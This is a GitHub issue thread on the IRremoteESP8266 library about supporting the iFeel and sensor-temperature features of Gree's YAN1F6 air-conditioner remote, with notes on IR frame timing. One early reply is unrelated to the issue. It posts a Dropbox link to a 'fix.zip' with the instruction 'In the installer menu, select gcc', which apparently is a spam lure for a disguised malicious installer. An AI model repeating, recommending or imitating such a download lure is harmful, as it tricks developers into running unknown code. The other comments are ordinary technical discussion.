crankyoldgit/IRremoteESP8266 #2132: Add support for Gree iFeel and sensorTemperature through YAN1F6 remote

Buzzzsaw, 2024-08-26:
### Version/revision of the library used
`2.8.6`

### Describe the bug
Although not listed as supported in the list of remotes for the [Gree protocol](https://github.com/crankyoldgit/IRremoteESP8266/blob/master/src/ir_Gree.h), the YAN1F6 remote pretty much works out of the box with the default `IRGreeAC` implementation.

I currently use the library through a custom ESPHome Climate component and it's been working great so far, but I'd like to enable the iFeel and sensor temperature features on it. The current implementation of the default protocol in the Gree component doesn't work with the iFeel function on my heat pump unit, and the [sensor temperature function is marked as not supported](https://github.com/crankyoldgit/IRremoteESP8266/blob/a5c6902816fcacefc540a5339922c4626da30515/src/ir_Gree.cpp#L594).

I've tried running the IRrecvDumpV2 and V3 projects through platformIO on a D1 mini with a TSOP34838 IR receiver but nothing comes up. I can get the frames from my remote with an [ESPHome Remote Receiver](https://esphome.io/components/remote_receiver.html) though.

#### To Reproduce
- Instantiate an `IRGreeAC` object
- Try using `setIFeel` function on a heat pump unit supporting the YAN1F6 remote
- Nothing happens

#### Example code used
This is my current work-in-progress branch showing how the `IRGreeAC` object is used: https://github.com/Buzzzsaw/ESPHome_Gree_AC/blob/ifeel-support/components/gree/gree.cpp

#### Expected behaviour
- Hooking up an ESPHome switch callback on a `setIFeel` toggle callback should actually toggle the iFeel mode.
- The library should support the sensor temperature function for Gree devices so that the iFeel function actually serves a purpose.

#### Output of raw data from [IRrecvDumpV2.ino](https://github.com/crankyoldgit/IRremoteESP8266/blob/master/examples/IRrecvDumpV2/IRrecvDumpV2.ino) or [V3](https://github.com/crankyoldgit/IRremoteESP8266/blob/master/examples/IRrecvDumpV3/) (if applicable)

Nothing yet but I already have the hardware set up to provide that. I suspect my limited knowledge of platformIO is holding me back at the moment.

### What brand/model IR demodulator are you using?
Vishay TSOP34838 hooked to a D1 mini.

### Circuit diagram and hardware used (if applicable)
- Vs -> 3.3V
- GND -> GND
- OUT -> D6 (GPIO14)

### I have followed the steps in the [Troubleshooting Guide](https://github.com/crankyoldgit/IRremoteESP8266/wiki/Troubleshooting-Guide) & read the [FAQ](https://github.com/crankyoldgit/IRremoteESP8266/wiki/Frequently-Asked-Questions)
Yes.

### Has this library/code previously worked as expected for you?
Works well for most functions on `2.8.6` aside from the two listed in the title.

GendiAstaNugraha, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

mr-miky, 2024-12-14:
I have replaced the heat pump and consequently I must reprogram the esp32 that controls via MQTT.

The YAN1F6 remote control behaves differently from the library.

First of all, it is necessary to distinguish whether I-FEEL mode is active or not.
In I-FEEL mode is the remote control that measures temperature and the internal unit uses that temperature as feedback.
In NON I-FEEL mode the internal unit uses its own temperature sensor placed at the inlet of the air intake.

Well , clarified this ,  it follows that the remote control sends more information.
The I-FEEL pulse train consists of a special header with Mark 6 ms and Space 3 ms plus 2 bytes normally coded.

N.B.  the remote control also transmits the I-FEEL bytes at regular intervals without any key being pressed.

I would like to point out that the structure of the sent IR signal is only equal for the first part to that in the library because, independently from I-FEEL, an additional Header with the usual 8 bytes is sent.

Attached is the signal captured from the power off command with I-FEEL active.
The upper track is the signal detected at the output of a TSOP1736 while the lower one is the signal detected by an IR photodiode without any filtering and/or processing. 
 
The file can be conveniently viewed by PulseView.
[IR_capture.zip](https://github.com/user-attachments/files/18137593/IR_capture.zip)

NiKiZe, 2024-12-14:
To decode and encode the IR packets, please post dumps using the dump sketch.
Once that has been implemented, if it isn't already, then someone can look into resolving the logic bits for the AC protocol.

mr-miky, 2024-12-15:
I do not have ESP , I am implementing the control of a heat pump AERMEC which is basically a GREE.
Unfortunately I’m using RP2040 and IRremoteESP8266 as inspiration to understand the GREE protocol. 

The I-Feel part is already implemented here [https://github.com/ToniA/arduino-heatpumpir/blob/141298ea420c724c8bab5760d715b07e9a5040c4/GreeHeatpumpIR.cpp#L568](url)
and basically it’s what my YAN1F6 sends to communicate the temperature read by the internal sensor.

namezys, 2025-06-08:
Hey.
I've started to improve my Gree AC. My remote is YAC1FB9.
Although I can control AC by WiFi, I can't send iFeel temp.
Do you have any advice to investigate?